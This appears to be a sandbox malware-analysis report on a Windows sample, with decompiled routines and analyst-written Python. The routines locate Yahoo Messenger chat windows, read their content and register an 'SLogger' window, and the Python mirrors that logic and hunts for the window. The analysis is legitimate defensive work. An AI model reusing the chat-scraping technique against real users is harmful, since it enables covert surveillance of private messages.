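The loop in the listing above is a walk over an RT_GROUP_ICON resource: it reads idCount at offset 4 of the group blob, takes the first nID at offset 0x12 (`_t71 + 0x12`), steps seven WORDs (`_t103[7]`, 14 bytes, one GRPICONDIRENTRY) per iteration and fetches each referenced icon with type 3 (RT_ICON); the group itself is looked up as MAINICON with type 0xe (RT_GROUP_ICON), falling back to EnumResourceNamesA when no MAINICON exists. Together with the GetTempFileNameA("bpk") / CopyFileA / LoadLibraryA / DeleteFileA calls this is an icon-group cloning routine. The Python below is an added example, not code from the sample or from this report: it parses a GRPICONDIR the same way, lists the RT_ICON IDs such a loop would copy, and checks for IDs the group references but the icon directory lacks. `build_group`, `SAMPLE_GROUP` and all function names are this example's own; the group bytes are constructed test data.

```python
"""Parse an RT_GROUP_ICON (GRPICONDIR) blob the way the decompiled loop does.
Added example, not the sample's code.  Layout per the Win32 icon resource
format: 6-byte header (idReserved, idType, idCount) followed by 14-byte
GRPICONDIRENTRY records whose last WORD, nID, names the RT_ICON resource."""
import struct

RT_ICON = 3          # third argument of E0041C9A7 inside the loop
RT_GROUP_ICON = 14   # 0xe, the type used for the MAINICON lookup

GRPICONDIR_HDR = struct.Struct("<HHH")        # idReserved, idType, idCount
GRPICONDIRENTRY = struct.Struct("<BBBBHHIH")  # 14 bytes; nID is the last WORD
# 6 + 12 == 0x12: the offset at which the sample reads the first nID.


def parse_group_icon(blob: bytes) -> list:
    """Return one dict per GRPICONDIRENTRY, in directory order."""
    if len(blob) < GRPICONDIR_HDR.size:
        raise ValueError("GRPICONDIR truncated")
    reserved, id_type, count = GRPICONDIR_HDR.unpack_from(blob, 0)
    if reserved != 0 or id_type != 1:
        raise ValueError(f"not an icon group (reserved={reserved}, type={id_type})")
    needed = GRPICONDIR_HDR.size + count * GRPICONDIRENTRY.size
    if len(blob) < needed:
        raise ValueError(f"GRPICONDIR claims {count} entries, only {len(blob)} bytes")
    entries = []
    for i in range(count):
        off = GRPICONDIR_HDR.size + i * GRPICONDIRENTRY.size
        w, h, colors, _res, planes, bpp, size, nid = GRPICONDIRENTRY.unpack_from(blob, off)
        entries.append({"width": w or 256, "height": h or 256,   # 0 encodes 256
                        "colors": colors, "planes": planes, "bpp": bpp,
                        "bytes": size, "id": nid})
    return entries


def icon_ids_to_copy(blob: bytes) -> list:
    """RT_ICON IDs the sample's loop would request with type RT_ICON (3)."""
    return [e["id"] for e in parse_group_icon(blob)]


def dangling_icon_ids(blob: bytes, present_icon_ids) -> list:
    """IDs the group references but the RT_ICON directory lacks: what a group
    copied without its member icons looks like in the resulting file."""
    present = set(present_icon_ids)
    return [i for i in icon_ids_to_copy(blob) if i not in present]


def build_group(entries) -> bytes:
    """Constructed test data: (width, height, bpp, bytes_in_res, nID) per entry."""
    out = GRPICONDIR_HDR.pack(0, 1, len(entries))
    for w, h, bpp, size, nid in entries:
        colors = (1 << bpp) if bpp < 8 else 0       # 0 = 256 or more colours
        out += GRPICONDIRENTRY.pack(w % 256, h % 256, colors, 0, 1, bpp, size, nid)
    return out


# Constructed: a two-entry group like a typical MAINICON (16x16/4bpp, 32x32/8bpp).
SAMPLE_GROUP = build_group([(16, 16, 4, 744, 1), (32, 32, 8, 2216, 2)])

if __name__ == "__main__":
    for e in parse_group_icon(SAMPLE_GROUP):
        print(f"{e['width']}x{e['height']} {e['bpp']}bpp -> RT_ICON #{e['id']}")
    print("dangling:", dangling_icon_ids(SAMPLE_GROUP, {1}))
```

To run this over a real file, hand `parse_group_icon` the data of a type-14 resource entry (with pefile: `pe.get_data(entry.data.struct.OffsetToData, entry.data.struct.Size)`) and the set of type-3 IDs present in the same directory; an output whose group references IDs that are missing, or whose icon sizes do not match `bytes`, is the trace this kind of copy routine leaves when the source and target resource trees disagree.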

    C-Code - Quality: 93%
    			E0040D3F6(intOrPtr __ecx) {
    				void* __esi;
    				void* _t50;
    				void* _t51;
    				void* _t52;
    				void* _t54;
    				void* _t56;
    				void* _t57;
    				intOrPtr _t62;
    				signed int _t84;
    				intOrPtr* _t85;
    				intOrPtr* _t86;
    				intOrPtr _t91;
    				void* _t93;
    
    				E0043E4E0(0x43fff3, _t93);
    				_push(__ecx);
    				_push(__ecx);
    				_t91 = __ecx;
    				 *((intOrPtr*)(_t93 - 0x10)) = __ecx;
    				 *((intOrPtr*)(__ecx)) = 0x446940;
    				_t84 = 0;
    				 *(_t93 - 4) = 0xd;
    				if( *((intOrPtr*)(__ecx + 0x47c)) > 0) {
    					do {
    						_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 0x478)) + _t84 * 4));
    						if(_t62 != 0) {
    							L0043DD36();
    							_push(_t62);
    							L0043DD42();
    						}
    						_t84 = _t84 + 1;
    					} while (_t84 <  *((intOrPtr*)(_t91 + 0x47c)));
    				}
    				_t85 = _t91 + 0x4c4;
    				 *((intOrPtr*)(_t93 - 0x14)) = _t85;
    				 *_t85 = 0x445440;
    				 *(_t93 - 4) = 0xe;
    				L0043DD72();
    				 *_t85 = 0x44547c;
    				_t86 = _t91 + 0x4a8;
    				 *((intOrPtr*)(_t93 - 0x14)) = _t86;
    				 *_t86 = 0x446a2c;
    				 *(_t93 - 4) = 0xf;
    				E0040DF39(_t86);
    				 *_t86 = 0x44547c;
    				 *(_t93 - 4) = 0xa;
    				L0043DD36();
    				 *(_t93 - 4) = 9;
    				L0043DD36();
    				 *(_t93 - 4) = 8;
    				L0043E1DA();
    				 *(_t93 - 4) = 7;
    				L0043E1E0();
    				 *(_t93 - 4) = 6;
    				_t50 = E0040E116(_t91 + 0x3c4);
    				 *(_t93 - 4) = 5;
    				_t51 = L00404F36(_t50, _t91 + 0x370, _t91);
    				 *(_t93 - 4) = 4;
    				_t52 = L00404F36(_t51, _t91 + 0x31c, _t91);
    				 *(_t93 - 4) = 3;
    				L00404F36(_t52, _t91 + 0x2c8, _t91);
    				 *(_t93 - 4) = 2;
    				L0043DF70();
    				_t87 = _t91 + 0x174;
    				 *((intOrPtr*)(_t93 - 0x14)) = _t91 + 0x174;
    				 *(_t93 - 4) = 0x10;
    				_t54 = L00403FBC(_t91 + 0x250);
    				 *(_t93 - 4) = 1;
    				L00404083(_t54, _t87, _t91);
    				_t88 = _t91 + 0x60;
    				 *((intOrPtr*)(_t93 - 0x14)) = _t91 + 0x60;
    				 *(_t93 - 4) = 0x11;
    				_t56 = L00403FBC(_t91 + 0x13c);
    				 *(_t93 - 4) =  *(_t93 - 4) & 0x00000000;
    				_t57 = L00404083(_t56, _t88, _t91);
    				 *(_t93 - 4) =  *(_t93 - 4) | 0xffffffff;
    				L0043E04E();
    				 *[fs:0x0] =  *((intOrPtr*)(_t93 - 0xc));
    				return _t57;
    			}
















    Instruction addresses (side column of the original layout; per-line alignment lost in extraction): 0x0040d3fb to 0x0040d566

    APIs
    • __EH_prolog.LIBCMT ref: 0040D3FB
    • #800.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D431
    • #825.MFC42(?,?,?,?,?,?,0040D3E2), ref: 0040D437
    • #2414.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D45B
    • #800.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D48D
    • #800.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D49C
    • #772.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D4AB
    • #810.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D4BA
    • #795.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D505
    • #641.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D553
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#2414#641#772#795#810#825H_prolog
    • String ID: |TD
    • API String ID: 4227990352-231495167
    • Opcode ID: bd5cb83daa1ad7b3e0f461ddc6411412d74bb2d4e719664e24794abdab7d26fd
    • Instruction ID: 6b85f4952407323f8866d637a9f4d6d98e82e9ff6b6d18cef21f2b851790c2c3
    • Opcode Fuzzy Hash: bd5cb83daa1ad7b3e0f461ddc6411412d74bb2d4e719664e24794abdab7d26fd
    • Instruction Fuzzy Hash: BB4181B0901785DAD714DBA5C1417DDFBF4AFA5308F10459ED49A232C2CBB82B08C726
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E0040ACF5(intOrPtr __ecx, void* __eflags) {
    				struct HWND__* _t24;
    				struct HWND__* _t27;
    				intOrPtr _t32;
    				CHAR* _t52;
    				void* _t54;
    
    				E0043E4E0(0x43fbc4, _t54);
    				_push(__ecx);
    				_push(__ecx);
    				_t52 = "Internet Explorer_Server";
    				 *((intOrPtr*)(_t54 - 0x10)) = __ecx;
    				 *((intOrPtr*)(_t54 - 0x14)) = 0;
    				_t24 = E0040FF68( *(_t54 + 0xc), 0, "YHTMLContainer", 0, _t52, 0);
    				_push(0);
    				if(_t24 == 0) {
    					if(FindWindowExA( *(_t54 + 0xc), 0, "IMClass", ??) == 0) {
    						L8:
    						_push(0x4550cc);
    						L0043DE26();
    					} else {
    						_t27 = E0040FF68(_t25, 0, "YHTMLContainer", 0, _t52, 0);
    						if(_t27 == 0) {
    							goto L8;
    						} else {
    							_push(FindWindowExA(_t27, 0, _t52, 0));
    							_push(_t54 + 0xc);
    							E00409B7F( *((intOrPtr*)(_t54 - 0x10)));
    							 *(_t54 - 4) = 0;
    							_t32 =  *((intOrPtr*)( *(_t54 + 0xc) - 8));
    							if(_t32 <= 4) {
    								_push(_t54 + 0xc);
    								L0043DD3C();
    							} else {
    								_push(_t32 + 0xfffffffd);
    								_push( *((intOrPtr*)(_t54 + 8)));
    								L0043DFD0();
    							}
    							 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
    							L0043DD36();
    						}
    					}
    				} else {
    					_push(FindWindowExA(_t24, 0, _t52, ??));
    					_push( *((intOrPtr*)(_t54 + 8)));
    					E00409B7F( *((intOrPtr*)(_t54 - 0x10)));
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
    				return  *((intOrPtr*)(_t54 + 8));
    			}








    Instruction addresses (side column of the original layout; per-line alignment lost in extraction): 0x0040acfa to 0x0040add8

    APIs
    • __EH_prolog.LIBCMT ref: 0040ACFA
      • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
      • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF90
    • FindWindowExA.USER32 ref: 0040AD2E
      • Part of subcall function 00409B7F: __EH_prolog.LIBCMT ref: 00409B84
      • Part of subcall function 00409B7F: SendMessageTimeoutA.USER32(?,00000000,00000000,00000000,00000002,00000096,?), ref: 00409BA8
      • Part of subcall function 00409B7F: #537.MFC42(00000000,?), ref: 00409C20
    • FindWindowExA.USER32 ref: 0040AD4E
    • FindWindowExA.USER32 ref: 0040AD6E
    • #4129.MFC42(?,?,?,00000000), ref: 0040AD99
    • #800.MFC42(?,?,00000000), ref: 0040ADB3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: FindWindow$H_prolog$#4129#537#800MessageSendTimeout
    • String ID: IMClass$Internet Explorer_Server$YHTMLContainer
    • API String ID: 2679677863-3466052522
    • Opcode ID: cbfb0505bd5ff32067bfed027ca958dd9ffec09b29c99b421f70ee8d457e02a3
    • Instruction ID: 9507c7077adb10eac93092fa8dbdadf757a6317969826f939f5394c173318484
    • Opcode Fuzzy Hash: cbfb0505bd5ff32067bfed027ca958dd9ffec09b29c99b421f70ee8d457e02a3
    • Instruction Fuzzy Hash: 3221D6B1900104BBCB10EF56DC49CAFBB3DEFC9765B10862FB815A6291D7389E00C669
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E0040EF63(intOrPtr __ecx) {
    				intOrPtr _t49;
    				intOrPtr _t50;
    				void* _t53;
    				char* _t57;
    				void* _t63;
    				void* _t66;
    				intOrPtr _t67;
    				void* _t69;
    
    				E0043E4E0(0x44026e, _t69);
    				_t67 = __ecx;
    				 *((intOrPtr*)(_t69 - 0x10)) = __ecx;
    				 *(_t69 - 4) = 0;
    				L0043DF64();
    				_t57 = __ecx + 0x48;
    				 *(_t69 - 4) = 1;
    				 *_t57 =  *((intOrPtr*)(_t69 + 0xb));
    				 *((char*)(_t57 + 1)) =  *((intOrPtr*)(_t69 + 0xb));
    				 *((char*)(_t57 + 8)) = 0;
    				E004105D6( *((intOrPtr*)(_t69 + 0xb)));
    				 *(_t69 - 4) = 2;
    				L0043DDD8();
    				 *(_t69 - 4) = 3;
    				 *((intOrPtr*)(__ecx)) = 0x446f60;
    				 *((intOrPtr*)(__ecx + 0x40)) = 0;
    				 *((char*)(__ecx + 0x44)) = 0;
    				L0043DFCA();
    				memset(_t69 - 0x48, 0, 0x28);
    				 *(_t69 - 0x48) = 0;
    				 *((intOrPtr*)(_t69 - 0x44)) = DefWindowProcA;
    				L0043E1C2();
    				 *((intOrPtr*)(_t69 - 0x34)) = 0;
    				 *((intOrPtr*)(_t69 - 0x38)) =  *0x00000008;
    				 *((intOrPtr*)(_t69 - 0x30)) = 0;
    				 *((intOrPtr*)(_t69 - 0x2c)) = 6;
    				 *((intOrPtr*)(_t69 - 0x28)) = 0;
    				 *(_t69 - 0x24) = "SLoggerClass";
    				L0043E270();
    				_t49 = 5;
    				 *((intOrPtr*)(_t69 - 0x20)) = _t49;
    				 *((intOrPtr*)(_t69 - 0x1c)) = _t49;
    				_t50 = 0x1e;
    				 *((intOrPtr*)(_t69 - 0x18)) = _t50;
    				 *((intOrPtr*)(_t69 - 0x14)) = _t50;
    				L0043DEF8();
    				__imp__CoInitialize(0,  *(_t69 - 0x24), "SLoggerWindow", 0, _t69 - 0x20,  *((intOrPtr*)(_t69 + 0xc)), 0x4d2, 0, _t69 - 0x48, _t69 + 8, _t63, _t66, _t53);
    				 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
    				 *((intOrPtr*)(_t67 + 0x5c)) = 0xf;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
    				return _t67;
    			}











    Instruction addresses (side column of the original layout; per-line alignment lost in extraction): 0x0040ef68 to 0x0040f063

    APIs
    • __EH_prolog.LIBCMT ref: 0040EF68
    • #567.MFC42 ref: 0040EF7D
      • Part of subcall function 004105D6: #823.MFC42(00000040), ref: 004105E2
      • Part of subcall function 004105D6: ??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004105FC
      • Part of subcall function 004105D6: ??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 00410626
      • Part of subcall function 004105D6: #825.MFC42(?), ref: 00410634
      • Part of subcall function 004105D6: #823.MFC42(00000040), ref: 00410642
    • #540.MFC42 ref: 0040EFA5
    • #858.MFC42(?), ref: 0040EFC0
    • memset.MSVCRT ref: 0040EFCC
    • #1168.MFC42 ref: 0040EFDF
    • #1232.MFC42(?), ref: 0040F005
    • #2124.MFC42(00453BC0,SLoggerWindow,00000000,?,?,000004D2,00000000,?), ref: 0040F034
    • CoInitialize.OLE32(00000000), ref: 0040F03A
    • #800.MFC42 ref: 0040F04E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #823Lockit@std@@$#1168#1232#2124#540#567#800#825#858??0_??1_H_prologInitializememset
    • String ID: SLoggerWindow
    • API String ID: 137274193-2554217539
    • Opcode ID: 901368f7e91618ae9ae689cf7cea8093a6089e54bfbc5b15bd697d8a1f4de3b0
    • Instruction ID: b45cb2e8fd06fa4ea6dbc9e53f194376a185aef7d77bda2344c2963643a349af
    • Opcode Fuzzy Hash: 901368f7e91618ae9ae689cf7cea8093a6089e54bfbc5b15bd697d8a1f4de3b0
    • Instruction Fuzzy Hash: E13180B0D01348AEDB00DFA5C881ADEBFB4FF08318F14446EE455A7282C7799A49CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 78%
    			E0040B4C1(intOrPtr __ecx) {
    				struct HWND__* _t38;
    				struct HWND__* _t52;
    				void* _t56;
    
    				E0043E4E0(0x43fceb, _t56);
    				 *((intOrPtr*)(_t56 - 0x18)) = __ecx;
    				_t38 = 0;
    				_push(0x4550cc);
    				 *(_t56 - 0x1c) = 0;
    				L0043DE26();
    				 *(_t56 - 4) = 1;
    				while(1) {
    					_t38 = FindWindowExA( *(_t56 + 0xc), _t38, "__oxFrame.class__", 0);
    					if(_t38 == 0) {
    						break;
    					}
    					_t52 = FindWindowExA(_t38, 0, "Internet Explorer_Server", 0);
    					if(_t52 != 0 && IsWindowVisible(_t52) != 0) {
    						_push(_t52);
    						_push(_t56 - 0x14);
    						E00409B7F( *((intOrPtr*)(_t56 - 0x18)));
    						 *(_t56 - 4) = 2;
    						if( *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x14)) - 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x10)) - 8))) {
    							_push(_t56 - 0x14);
    							L0043DFCA();
    						}
    						 *(_t56 - 4) = 1;
    						L0043DD36();
    					}
    				}
    				_push(_t56 - 0x10);
    				L0043DD3C();
    				 *(_t56 - 0x1c) = 1;
    				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
    				return  *((intOrPtr*)(_t56 + 8));
    			}






    Instruction addresses (side column of the original layout; per-line alignment lost in extraction): 0x0040b4c6 to 0x0040b58b

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$#800Find$#535#537#858H_prologVisible
    • String ID: Internet Explorer_Server$__oxFrame.class__
    • API String ID: 868504759-2130105940
    • Opcode ID: de1ab3cd1415bd1dd9643439e70a4bf75231eb6a9a02cf578f4aaf1f8b4b78a3
    • Instruction ID: c7b46500d06fd80d29eacddbb276dd23fc7a63454924b9df6a3b0a18ece1216b
    • Opcode Fuzzy Hash: de1ab3cd1415bd1dd9643439e70a4bf75231eb6a9a02cf578f4aaf1f8b4b78a3
    • Instruction Fuzzy Hash: 96215671D0014AEACB10EFA5D995FBFBB78FB89704F10446EE411A3281D778AE04CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0040ADDB() {
    				signed int _t18;
    				void* _t22;
    				signed int _t26;
    				void* _t36;
    
    				E0043E4E0(0x43fbd8, _t36);
    				if(IsWindow( *(_t36 + 8)) == 0) {
    					L7:
    					_t18 = 0;
    				} else {
    					if(strncmp( *(_t36 + 0xc), "IMClass", 7) != 0) {
    						if(strncmp( *(_t36 + 0xc), "YSearchMenuWndClass", 0x13) != 0) {
    							goto L7;
    						} else {
    							_push( *(_t36 + 8));
    							_push(_t36 + 8);
    							_t22 = E0040FEA7();
    							_t26 = 0;
    							_push("Instant Message");
    							 *(_t36 - 4) = 0;
    							L0043DFD6();
    							if(_t22 != 0xffffffff) {
    								_t26 = 1;
    							}
    							 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
    							L0043DD36();
    							_t18 = _t26;
    						}
    					} else {
    						_t18 = E0040FF68( *(_t36 + 8), 0, "YHTMLContainer", 0, "Internet Explorer_Server", 0) & 0xffffff00 | _t23 != 0x00000000;
    					}
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
    				return _t18;
    			}







    Instruction addresses (side column of the original layout; per-line alignment lost in extraction): 0x0040ade0 to 0x0040ae8b

    APIs
    • __EH_prolog.LIBCMT ref: 0040ADE0
    • IsWindow.USER32(?), ref: 0040ADEA
    • strncmp.MSVCRT(?,IMClass,00000007), ref: 0040AE08
    • strncmp.MSVCRT(?,YSearchMenuWndClass,00000013), ref: 0040AE3C
    • #2764.MFC42(Instant Message), ref: 0040AE60
    • #800.MFC42(Instant Message), ref: 0040AE73
      • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
      • Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF90
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Window$Findstrncmp$#2764#800H_prolog
    • String ID: IMClass$Instant Message$Internet Explorer_Server$YHTMLContainer$YSearchMenuWndClass
    • API String ID: 3637711971-669420900
    • Opcode ID: c707bfecf86fe6d6df8b954859b7ed41a3bf4fde4fd87e9a8a77da242c93ee4e
    • Instruction ID: a8082ce531a0ae01416219cf90003906a59ee9abe53975e76382586ffc31f206
    • Opcode Fuzzy Hash: c707bfecf86fe6d6df8b954859b7ed41a3bf4fde4fd87e9a8a77da242c93ee4e
    • Instruction Fuzzy Hash: AB119471940208BBDB109F60DC82F9E7B189F15399F208137B815A61E1E7389F199699
    Uniqueness

    Uniqueness Score: -1.00%
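The three window-hunting routines on this page select Yahoo Messenger conversation windows by class name: E0040ADDB accepts a window whose class starts with "IMClass" (strncmp, 7 chars) only if it has a "YHTMLContainer" child with an "Internet Explorer_Server" child (the two chained FindWindowExA calls in E0040FF68), or whose class starts with "YSearchMenuWndClass" (19 chars) and whose text contains "Instant Message" (CString::Find, MFC42 #2764, != -1); E0040B4C1 walks every "__oxFrame.class__" sibling and keeps the ones whose "Internet Explorer_Server" child IsWindowVisible, then reads their content through E00409B7F (SendMessageTimeoutA) and keeps the longest. E0040EF63 earlier on the page registers the sample's own window class "SLoggerClass" and creates a window titled "SLoggerWindow". The Python below is an added example, not the sample's code: it reproduces the selection logic against a small window tree so the search order is visible, and adds the defender-side query for SLoggerClass. `WindowTree`, `Win` and the function names are this example's own; `WindowTree` stands in for FindWindowExA, IsWindow, IsWindowVisible and GetWindowTextA with the same semantics (on a live Windows host these can be backed by ctypes calls to user32), the content read via SendMessageTimeoutA is not reproduced, the tree is constructed test data, and it is an assumption that the SLogger window is created top-level, since the decompiled CreateEx call receives its parent from the caller.

```python
"""Window-class selection mirrored from E0040ADDB / E0040FF68 / E0040B4C1,
plus a hunt for the SLoggerClass window E0040EF63 registers.
Added example, not the sample's code.  WindowTree is a constructed stand-in
for user32 FindWindowExA / IsWindow / IsWindowVisible / GetWindowTextA."""
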